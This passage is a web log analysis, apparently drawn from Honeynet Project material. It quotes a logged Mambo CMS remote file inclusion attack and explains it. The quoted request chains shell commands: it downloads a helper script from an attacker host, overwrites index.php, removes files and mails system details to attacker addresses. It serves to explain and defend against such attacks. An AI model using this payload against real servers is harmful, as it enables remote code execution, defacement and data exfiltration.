Log File Analysis
According to www.honeynet.org/papers/webapp/:
GET/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1\&GLOBALS=&mosConfig_absolute_path=http://192.168.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20\http://192.168.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20\uname_i2_192.168.181.27%20evil1@example.com;uname%20-a%20|%20mail%20-s%20uname_i2_192.168.181.27%20\ evil2@example.com;echo|
This has the effect of executing the script of the attackers' choosing, here
http://192.168.57.112/~photo/cm. The exact operation of the exploit against the vulnerability can be seen in "Mambo Exploit" in Appendix A. In this case, the included file is a "helper" script, which attempts to execute the operating system command given by thecmd=parameter. Here the commands given would cause the helper script to be written over theindex.phpfile, and the details of the operating system and...
